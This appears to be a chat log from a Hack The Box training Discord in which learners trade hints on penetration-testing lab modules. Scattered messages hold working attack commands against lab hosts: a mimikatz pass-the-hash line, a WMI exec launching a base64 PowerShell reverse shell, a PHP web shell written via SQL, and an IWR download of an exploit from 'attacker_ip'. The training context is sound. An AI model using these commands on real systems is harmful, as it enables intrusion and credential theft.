- ssh carlos, got svc_workstation's AES-256 HASH
i see many people fail when try hashing AES-256, is it the correct way to try hashing AES-256 ?
anyone can give me a hint ?
Can’t crack that afaik, there’s another file in the general area that will give you the NTLM hash
alright, already find other file
but can't ssh/sudo, still figure it out
hello. please i need help in login brute force module , cracking the password of admin user any hints
i'm in module password attacks PTH(pass the hash)
i ran mimikatz
but i get access denied
You are not accessing the file via DC01
Thank you for responding. Sorry for being so vague but let me elaborate on the issue. The script runs but it freezes on :
[*] Setting a minute wait in between sprays.
regardless of whether I attach a UserList or not. In the module, it moves onto the next prompt asking “Would you like to conduct the password spraying attack”. I cannot get to that prompt.
You are only listing the file via DC01
Ah, my message got deleted, f lol
Can someone please help me? Ive got the user ||Fiona|| and the password and logged in via RDP, but I cannot find the user I can impersonate to get admin
I mean if you check c:\users maybe or do sql from the command line you might have better luck
The thing is
Ive done that but I cant upload screenshots because they get deleted, even if I put them as spoilers
Ive found 6 users, and 1 user that is a part of the local administrators group, but that 1 user isnt correct
Sir
If this is about using mssql
That has impersonate permissions
And should probably look there first
Wha, but aaa the way they make it seem
Like find her password, (I found it through rdp) and then it tells me once I am logged in, like as in RDP I thought
What section is this for?
understood, so i'm logged in as david, how do i find dc01?
So I can look up
They are meaning you didn't try and look at the flag using \\dc01\david
Lol
It's not a local file
Attacking Common Services - Hard
Ah I don't fully recall this one, but you're probably trying too hard. Like I said c:\users is gonna be your friend
None of those users work
Weird
hey I'm stuck at "Attacking Common Services " : "Attacking DNS"
I'm not sure I understand the Q
I found (using subbrute.py & names_small.txt) a few subdomains. I'm not sure what the meaning of "submit the flag found as a DNS record as the answer" is, since I didn't find any flag....
some 1 have a hint ?
I am pretty sure its not that, he just has to run type and the file located on the system, i wont write the command xd
what do you mean by my ticket ?
oh thanks god you are on phone, for a sec i thought the academy best helper don't have good note 🤣
same error message
I need to redo this module when I have it
You need to get the ticket first, try reading the module again
i saw he is on the pass the ticket module and i did have issue with ticket no longer being valid for some reason
weird lol
The full path is \\DC01\david\flag.txt
like MarcieLee hint if the question is about mssql and you are look via rdp then you are on the wrong path
The question isn't I don't think
They just posted a bunch of stuff about mssql earlier
¯_(ツ)_/¯
It got yeeted by a mod
yea i know, but same error message
yea i saw that and also thought that was you 🤣
@pulsar needle if you are on question 3 then it's definitely mssql
But the credentials dont work for MSSQL, and I cant bruteforce it
check your ticket just for sure
I'm not a mod
Ok
Cap
*yet
I'm not lol
what do you mean by ticket ?
Try to read the section again
Try logging in another way to mssql. I think you are missing 'the way'.
i'm on the module before the ticket
I think the way is locally, but I have no clue how to do that xd
oh you are on the pth section not next ptt section, let me double check
i have a meeting in 3mins so i'll have to pause for a few. i'll be back in an hr
@high reef the quickest way to confirm that you still have access to the dc is running the previous dir command that you ran, and if you can still see the flag that means you still have access and can just get the flag
but if you get permission denied then just run the attack again
also my bad for the ticket thing
no problem!
wait you have confirm what's the right password is why are you still brute forcing 🤣
should I use names.txt?!
Hahha idk, when I get stuck I think outside the box😎
Sqlcmd
Try just the command with no parameters
also stop sending screenshot with cred or other spoiler even with the spoiler it's still a big no no
*that screenshot have 1 sqlcmd command so it's least to say no need to remove that
got the flag
k
Hi im stuck with keeper. i have user flag and now doing the PoCs exploit, but cant guess the pass that is given to me. And hints? Thanks in advance ! 🙂
did you solve it? im stuck at the same point @west spindle
Verify your account in #welcome and you'll have access to #1139981418164920464
read #welcome and #rules after that use /verify at #bot-commands and ask that in #1139981418164920464
windows privesc skills assessment 1
i think it involves ||juicypotato|| and i want to try it, how can i transfer the files to the server so i can test it? i tried with an http server and wget but it did not work, i tried curl too
Hi I am new, I have a question if anyone can answer it.
In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1”. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. It freezes at
[*] Setting a minute wait in between sprays.
Any advice?
- http server
- FTP
- base64
- SMB Server
- DNS
Hi for that question the formatting doesn't include the square brackets [] , but it does include the semicolon ;
There are many options out there, just search "file transfers ctf" or "file exfiltration hacking" and you'll find stuff. If one doesn't work, try another, or double check your syntax and troubleshoot exactly where things aren't going as planned
https://academy.hackthebox.com/achievement/285625/116 ez flag after i found out i was supposed to logon to the mssql server lol
Organizations regularly use a standard set of services for different purposes. It is vital to conduct penetration testing activities on each service internally and externally to ensure that they are not introducing security threats. This module will cover how to enumerate each service and test it against known vulnerabilities and exploits with a...
there is spoiler in both screenshot
is it Mark ?
you and Noke1 should look into tools like greenshot and flameshot to censor cred, hash and other spoiler
i forgot but if the section doesn't give you the j user hash then that's spoiler
Hi, trouble in **Attacking Common Applications >> Exploiting Web Vulnerabilities in Thick-Client**.
I follow the steps, but when I try to compile: C:> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java - gives me 31 errors in the code...
Now, I changed only what they said
Any help, ideas would be welcomed 🙏
they give her hash
oh then again my bad 🤣
only difference i see is that they are using svc_workstation
💀 Attacking AD is awfully close, and scary, its like a boss approaching
don't worry it's won't kick you in the ball
it's easier for other to help if you ask better question, instead of "i can't fix this error" and 2 screenshot in which one of them is 99% error message and what look a like the command you ran try adding what part of the section are you trying to do, what did you try and what fails in to your question
Anyone around that has done the Value Fuzzing section for the "Attacking Web Applications with FFUF" module?
sure what's the issue?
The section is not accepting my flag answer, even though the flag is being returned to me in the curl command, just as the module described it should return
so basically you have the flag but the section doesn't accept that flag?
Yep, here is a shot:
yep you definitely need to remove that before a mod do it for you
but which section are you on?
holy hell, never mind, i had a space in the answer at the end of the value. yea i was going to delete after posting
thanks for the response though lol
yea adding that part still doesn't help that much
but to be honest just follow this https://0xdf.gitlab.io/2020/08/08/htb-fatty.html#admin-access
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get the client to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL ...
also that guy have cheat sheet on decompiling + compiling the client
its a webshell, i cant run cd /, it doesnt stay there, thats my problem, is there a way to transfer the file in one line?
You can just specify an absolute path. Something like IWR http://attacker_ip/potato.exe -Outfile C:\Users\Public\vegetable.exe
and then C:\Users\Public\vegetable.exe [OPTIONS]
you know you can just get a shell from that right?
i tried an one liner revshell but it did not work, bigger commands dont work in general
if you are trying the get a shell from revshells.com then that's generally don't work for me, for windows box if i need a shell i usually go for hoaxshell or meterpreter
i got it working with hoaxshell, thanks a lot man
these are the steps i took, mimikatz and with MS01 creds (this is to enable the listener with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:
mimikatz.exe privilege::debug "sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe" exit
A nc listener is configured to listen on any 8001.
Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e ‘’‘base64 here’‘’”
Note: all instances of cmd and ps are run as admin.
I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.
i did not copy the reverse shell base 64 in module i copied it from website and still having issues
hi guys im a beginner in cybersecurity, can you tell me how to get started and what to install like kali linux or what
Any*
Ok my bad
yeah Ive read them
just wanted to know how to get started
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
and #modules message
thanks
Attacking Common Services
Attacking Common Services - Easy
Hello, i am struggling to upload a shell
I tried with mariaDB a lot, and the cmd command dont get me result except of "dir". If i go higher it say that i am not authorized to access.
I tried to code base64 more complex code to avoid "" '' with no success
The code I use is ||SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\cmd.php";||
If there is another way of uploading a file I would be pleased to try
THx
any idea with this???
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
I have done pth and could not remote to DC01
Your screenshot has spoilers in it. You should probably delete it, or blank out the spoilers.
ok
You're on question 8 of Ad Enum Skill Assessment 2?
AD Enumeration & Attacks - Skills Assessment Part I last question
... i meant you should blank it out from the image. 🙂
The username and hash are part of some of the answers
ok now...
User: in mimikatz output 😉
/domain:dc01
I hate that...
But to answer your question, I used impacket-wmiexec via a proxychain
You don't need to specify .inlanefreight.local
Just dc01
At least I don't believe you do
any hint for module- 77 section- 844
how you get the hash for wmiexec... is that the same one??
Secretsdump.py with t**** user
What's your actual question: and 2 module numbers mean absolutely nothing to most
What's the module and section name
"Privilege Escalation" module of "Getting started"
Follow the section carefully if I recall correctly
OK 🙂
Do you specify FQDN in /domain ? I don't think you can remote to DC01 with this method.
@rustic sage Trying to bruteforce the password with rockyou.txt. How long should it take? Going on an hour, but says it will take almost 2000hrs to complete. Using max tasks as 64
yes...
you have chisel.exe??
...
You just specify the domain not FQDN and get process created that will pop in your own system but that shell is in your own system and not any other remote.
If you want remote to DC01, you'll have to follow what wolfie said.
I'm completely stuck on the skill assessment for Pivots, question 4.
I have managed to upload a payload to the webserver but I cannot execute it with ./payloadname.
How am I supposed to actually do anything though?
Don’t have my notes atm, but I believe used metasploit on that one
any help pls
If I understand you correctly, you have a WebShell?
If so, what exactly is the problem?
i can't upload it 😢
Send me a DM.
I'm so stupid, I forgot to add the execution rights to the payload file
i need help.
i am trying to connect to openVPN and i have done so using the sudo openvpn {fileName} and in my HTB home page it shows as connected. the problem is that when i try to ping a machine it can't reach it
this problem has been reoccurring, and haven't found any reliable way of fixing it. it just works if it wants to :/
hey ! i'm a beginner, i'm reading the difference between TCP and UDP ports, do you have a good example where "UDP is suitable for applications that run time-sensitive tasks since dropping packets is faster than waiting for delayed packets due to retransmission" ? thanks!
IPTV, VoIP
oh! make sense! thank you!
Hi everyone. I'm working on the MSSQL section of the Footprinting module, and I'm having trouble with the second question. I cloned the impacket repository from GitHub, navigated to the subdirectory containing mssqlclient.py, and ran the command "python3 mssqlclient.py backdoor@10.10.10.10 -windows-auth" (replacing 10.10.10.10 with the IP of my target). I get this error: No module named "impacket.examples.mssqlshell" This same error occurs in both the Pwnbox and my Kali VM.
If you’re on Kali, try using impacket-mssqlclient instead of mssqlclient.py
Impacket installs can be a nasty thing to debug so hopefully this will just work
Oh wait I’m on mobile, didn’t see the full command. Try calling mssqlclient.py by itself, don’t navigate to the directory, just call it as you would any normal command
When I run the same command from any directory not containing the mssqlclient.py file, I get a file not found error.
Hm, then try impacket-mssqlclient
That did the trick!
I didn't realize there was a pre-installed package called impacket on Kali already. Didn't even need to clone the repo from GitHub. Just replaced "python3 mssqlclient.py" in the command I posted above with "impacket-mssqlclient" as suggested, and it worked. Thanks a ton!
I need a hint for broken authentication skills assessment please
Yep. Know that impacket is a very finicky tool, so people have done what they can in Kali and Parrot to make using it as stable as possible
What is not working?
should not i have the button here to download vpn config?
somewhere around there XD
ya i know its on profile but why would they remove it xD it was handy
lol
HAHAH
so my profile is broken or what
there is no button
weird
any mods
did
thx
not even loading on another browser
thats the link on the button
because someone spammed the other day
i figured it out
it happens when the service to exploit is a web server
because this web servers are open to the internet (i could access from my phone)
cool thanks 😎
please any help with Skills Assessment - File Inclusion, i got cookie after visiting http://94.237.56.76:55913/index.php?page=$$$_ad$$$/index and got to page for logs that doesnt work, Path Traversal not working so cant use cookie poisoning or view any log
tried to fuzz the new parameter but no result
tried /index.php?lo$$=access.log but the parameter only returns the main page
Has anyone ran into any issues during Exploiting Web Vulnerabilities in Thick-Client Applications? I cannot get the server.jar to download to save my life, just outputs to screen. Maybe its time to give it a break
dont try to display it, open a file to write to it.
Hmm. Should just be writing data to file specified. I will re-check again. Thank you!
Likely mixed up editing from the previous example that has you display it.
You are probably correct
Hi guys! Can someone help me with Footprinting medium lab? I got stuck in building query in MSSQL.
Can someone help me with the Internal Password Spraying - from Windows module?
Just finished the Pivoting module, but I don't think I did the skill assessment in the best way, especially for the last question. Would love to pick someone's brain on how to do this properly sometime
Import the Library-Question library appropriate for your OS and dotNet version, using the HTBLibrary namespace. What is the output of the Flag.GetFlag() method from the library?
hi, I'm stuck at this question (Introduction to c# module libraries section) and I don't know why
this is my code using HTBLibrary; class test { static void Main(string[] args) { Flag.GetFlag(); } }
and I got this error error CS0246: The type or namespace name 'HTBLibrary' could not be found. Are you missing an assembly reference?
sounds like it cant find where HTBLibrary is supposed to be
Havnt done that module but review any setup instructions they have for the exercise
you can try to read the source code and check for anything there :)
The AD Attacking and Enum module can help u with that a bit, also the Attacking passwords Module has Pass The Hash Sections that make u exercise that as well.
you can also go back the skill assessment and experiment with other ways to pivot around and see how things work.
Hey thanks a lot that was really helpful
This Link says that one of the reasons might be a missing .dll file.
you can check the references in your project and make sure you have it there.
it also might be any other thing mentioned there but this one seems the most reasonable.
Can someone help me?
lol good point, I am stuck on the Internal Password Spraying - from Windows module, it is a part of the ACTIVE DIRECTORY ENUMERATION & ATTACKS.
and
you need to provide information on what youre stuck on, what youve tried, ect ect
Great. Glad it helped.
okay cool, this room is supposed to be simple. RDP into the target IP and use the DomainPasswordSpray.ps1 for the password 'Winter2022' and submit the user's username as the answer. However, the script freezes at the "[*] Setting a minute wait in between sprays" line and doesn't progress. I have tried supplying a userlist, redownloading the script, manually adjusting the script, searching online for a hint, trying to run other tools. I have been unsuccessful at every turn. Someone earlier attempted to provide an answer but they completely missed my problem and told me something I already knew. I did appreciate his help. Do you have any hint that you could give me?
whats the exact command youre running
it is a two part command
First: Import-Module .\DomainPasswordSpray.ps1
Second:Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
I've also tried running .\DomainPasswordSpray.ps1 -Password Winter2022
Also thank you for taking the time out of your day to help a noob like me.
hmmm yeah shouldnt be giving an issue. Not sure why itd be grabbing the lockout window like that cause the lab shouldnt have one
Id just edit out that function and have it return 0 but thats a little out of scope
the function at line 261?
Oh yeah, I had to change that to ${Message} because it kept crashing at that line, which function do you advise I modify?
Minutes is empty
empty??
Yeah, this line correct?
[*] The domain password policy observation window is set to minutes.
Sounds like something is really wrong then. Junk the file and grab a fresh copy you havnt messed with
okay let me try that
oh looks like it is supposed to be empty afterall
oh okay
I transfered a fresh copy straight from the github page, if I don't modify line 261 I can't import the module. I am using evil-winrm.
why are you using evil-winrm when it asks you to RDP in
RDP does not launch on the machine, I tried using xfreerdp, and rdesktop.
Yes it does
Okay let me try it again
Yeah just tested the lab, following the instructions provided worked
Got it!
nice
have you gotten a broken pipe error when using the xfreerdp?
Thank you so much, I was so frustrated because every time I used the xfreerdp it was just a blackbox that spawned so I assumed it wasn't working
yup, thats just the screensaver:)
at that line of the script the error is because of the absence of curly braces to parse the value of the Message variable value and the use of the colon beside it, I also had to modify it to work thought it was just me, does it work for you now?
@fathom pendant og
Seems like probably just some funkiness with evil-winrm
Oh
yeah
mhm good to know in the future when I am using the tool
Yeah evil-winrm seems somewhat limited
@thorn urchin Seriously thank you for your patience with me, I was hesitant about joining the discord because I thought it was gonna be like Stack Overflow. Thank you for proving me wrong! Enjoy the rest of your day 🙂
Np! and Im considered one of the resident assholes too! best of luck
Hey guys! I’m having trouble with the pre ignition machine in starting point tier 1
Specifically where I’m supposed to give the switch that finds php pages
Oh.. looks like the man page is incomplete
Found it
Hi i'm having problem in the 'introduction to c#' module in the Libraries section, i can't import the Library-Question library (i'm using win x64 and dotnet 7.0)
Are there any pathway specific rooms? Like for CREST?
Iirc there's a CREST path
hi guys! I wanna ask how bug hunters do the job, I mean they not suddenly scanning some website after account registered right?
how about collaboration and coordination with website owner?
Hello there, could anyone give a hand with the Injection Attacks Skill assessment? I have identified the PDF exploit but can't find the internal web app, thanks in advance
Advanced sql injection pwned in case someone needs help with it
Dm if you’re still stuck
Just finished the CPTS path today. I would like to say thank you to @west canopy @autumn pilot. These two hackthebox staff members were super helpful during my time learning CPTS. I gained a lot of knowledge thanks to them.
Hi,
I am stuck on the following question in the AD - Living off the land module
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I understand that I need to change the filters according to the instructions, but cannot seem to run dsquery. I believe I would need to priv esc to the local admin user which I have found from the previous question but not sure how to do so :/
Hello,
I am stuck in installing dnscat2 on https://academy.hackthebox.com/module/158/section/1436
An error occurred while installing trollop (2.1.2), and Bundler cannot
continue.
It happens on my host and also on HTB academy workstation
hey guy, I'm "Attacking Common Services" : "Attacking DNS" & kind of stuck, I'm not managing 2 do DNS transfer, what am I missing?
have u solve this easy lab ?
What did you try and what didn't work?
nvm i got the passwd root
I used "subbrute" with "names_small" looked at all the ns of them, then tried axfr with them
none did it
am I supposed 2 enter the domain 2 the /etc/... file?
What happens when you do that?
Take a close look at the process of name resolution
yes
Do I understand you correctly? You tried to make a zone transfer to an NS Record?
lol
I tried everything with the given data...
Send me a DM
Hlw friends
One doubt
Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)
Run su -h and see if you find anything - I don't think there is an option though, it's typically just su mto discord.sh to run the script as "mto"
sudo however has --user=NAMEHERE
sudo --user=mto discord.sh
I tried this also but i can't find the exam answer
Its a flag
Question of academy
su -h to view the options for executing commands
you should answer the option for it
Let me try
It's probably also explained in the section of the module
Linux fundamental/page15/User management last flag answer ?
I checked but not working
what is your option for the answer?
Sudo -h and -u
su -h
this command to view the options for the answer!
it's not the answer!
Same as you told
Sir
What they are saying is that the answer is found by actually reading
And not just copy/paste and not understanding
Also not working
what is your answer? @obsidian crag
@obsidian crag don't be hurry
you should read and step by step to understand what you learned!
Yup
remove your answer!, it will be ok
Ok
See here, when in doubt check the -h flag or man <command>
Since it seems like it's a fundamental course, they are more lax on those answers
there is also curl cheat.sh/<command>
Yesterday I had a doubt
for what?
I used the curl command but all the time the connection got refused
what is your section and your module?
But i solved it
also English speakers never say "I have a doubt"
I forgot about that..actually i already cleared that..it took updatedb
Instead of this what i have to say ?
Well it depends what you're meaning to say
At most English speakers will say, "I have my doubts" when speaking broadly to someone, or they'll say "I doubt X".
You also usually only say doubt if you're disbelieving something that's second hand knowledge to you. You wouldn't say you have doubts about something you did.
In your case, you would need to be more specific about what you meant to say.
I'll follow
👍 it's a very common mistranslation from people coming from certain languages
In the case of you were trying curl yesterday but having problems you would say something like, "I was having issues with this yesterday"
How can i use curl for the real world system ?
Do you mean what real world use does curl have? or something else?
Depends on what you want to do.
Ex.
curl www.example.com shows you the source code of the website in the terminal
But it's not working
Provided the machine has access to the Internet and the name resolution works, this should work.
anyone done the Credentials in Object Properties section on the Windows Attacks & Defense module? i'm stuck on question 3. i did filter for the id that's in the hint and that gave me like forty something results but none of them are from bonni. also tried to filter using all 4 ids under the Detection part of the section but that also didn't get me the answer. and i did try to filter using some xml stuff, basically filter for TargetUserName as bonni which should give me all of bonni's logs, but i got back 0 results which is kinda shocking (also the xml filter that i used works for other users)
Filter by EventID
yep i tried with the 4 ids under the Detection part and the one in the hint
I have written a DM to you
yeah i was just getting the id that i used
hello all, anyone on to assist with Attacking Enterprise Networks - Web Enumeration & Exploitation "Use the command injection vulnerability to find a flag in the web root. Submit the flag value as your answer (flag format: HTB{}). "
the last question ... i can see the XXXXflag.txt file.. wasted some hours trying to read it but no go, any suggestion plz
So, when it comes to that module, it's really more of a practice test. You should be trying your hardest to do it without help, but if you do really feel the need, the module itself is a complete walkthrough, and you should just follow exactly what is shown - step by step. I would advise against doing so, and to keep working it on your own, though.
i'm pretty sure there is a note in the section that will guide you a bit
yeah im trying that
Hi. I want to learn hacking,
i understand what you're saying, but i came here for help because i've wasted enough hours stuck without learning anything
Check the module. Actually, every step is explained there in detail.
Thank you
I love u
Thank you Rat and payloadbunny that was a pretty good hint 😉
This module is a great opportunity to test your readiness for the exam, if you do it blind. If you do not care about the preparation, then the module itself is just a straight walkthrough - if you follow every step exactly as they do it, it will get you any answer you need (no need to try to figure anything out).
Cheers 🍻
Added command Injection to my list to be worked on ✅️
